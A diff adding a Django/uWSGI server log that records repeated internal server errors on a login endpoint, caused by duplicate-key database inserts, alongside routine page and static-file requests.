+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+[pid: 11057|app: 0|req: 770/1008] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:44 2021] POST /login/ => generated 208507 bytes in 136 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 771/1009] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 08:37:10 2021] GET /login/ => generated 6428 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1010] 219.228.146.156 () {40 vars in 865 bytes} [Thu Jan 14 08:37:10 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1011] 219.228.146.156 () {40 vars in 887 bytes} [Thu Jan 14 08:37:10 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1012] 219.228.146.156 () {40 vars in 869 bytes} [Thu Jan 14 08:37:10 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1013] 219.228.146.156 () {40 vars in 867 bytes} [Thu Jan 14 08:37:10 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1014] 219.228.146.156 () {40 vars in 873 bytes} [Thu Jan 14 08:37:10 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1015] 219.228.146.156 () {40 vars in 848 bytes} [Thu Jan 14 08:37:10 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1016] 219.228.146.156 () {40 vars in 846 bytes} [Thu Jan 14 08:37:10 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1017] 219.228.146.156 () {40 vars in 864 bytes} [Thu Jan 14 08:37:10 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1018] 219.228.146.156 () {40 vars in 862 bytes} [Thu Jan 14 08:37:10 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1019] 219.228.146.156 () {40 vars in 854 bytes} [Thu Jan 14 08:37:10 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1020] 219.228.146.156 () {40 vars in 908 bytes} [Thu Jan 14 08:37:10 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+[pid: 11057|app: 0|req: 772/1021] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 08:37:17 2021] POST /login/ => generated 208453 bytes in 122 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+[pid: 11057|app: 0|req: 773/1022] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 08:37:19 2021] POST /login/ => generated 208453 bytes in 106 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+[pid: 11057|app: 0|req: 774/1023] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 08:37:20 2021] POST /login/ => generated 208453 bytes in 165 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 775/1024] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 08:37:27 2021] POST /login/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 776/1025] 219.228.146.156 () {40 vars in 913 bytes} [Thu Jan 14 08:37:27 2021] GET /home/ => generated 7863 bytes in 11 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 47098] hr_write(): Broken pipe [plugins/http/http.c line 565]
+[pid: 11057|app: 0|req: 777/1026] 180.160.72.163 () {42 vars in 1109 bytes} [Thu Jan 14 08:37:36 2021] GET /publish/ => generated 4739 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 778/1027] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 08:37:36 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 779/1028] 219.228.146.156 () {40 vars in 896 bytes} [Thu Jan 14 08:37:39 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: -1|req: -1/1029] 219.228.146.156 () {42 vars in 880 bytes} [Thu Jan 14 08:37:39 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 11057|app: 0|req: 780/1030] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 08:37:46 2021] POST /login/ => generated 27 bytes in 62 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 781/1031] 219.228.146.156 () {40 vars in 913 bytes} [Thu Jan 14 08:37:46 2021] GET /home/ => generated 7863 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 782/1032] 180.160.72.163 () {40 vars in 1056 bytes} [Thu Jan 14 08:38:06 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 783/1033] 180.160.72.163 () {42 vars in 1110 bytes} [Thu Jan 14 08:38:08 2021] GET /my-admin => generated 0 bytes in 2 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 784/1034] 180.160.72.163 () {42 vars in 1112 bytes} [Thu Jan 14 08:38:08 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /favicon.ico
+[pid: 11057|app: 0|req: 785/1035] 180.160.72.163 () {40 vars in 1028 bytes} [Thu Jan 14 08:38:09 2021] GET /favicon.ico => generated 3480 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 786/1036] 180.160.72.163 () {42 vars in 1107 bytes} [Thu Jan 14 08:38:49 2021] GET /home/ => generated 7863 bytes in 11 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 787/1037] 180.160.72.163 () {40 vars in 1056 bytes} [Thu Jan 14 08:38:55 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 788/1038] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 08:39:01 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 789/1039] 180.160.72.163 () {48 vars in 1161 bytes} [Thu Jan 14 08:39:12 2021] POST /login/ => generated 82 bytes in 6 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0)
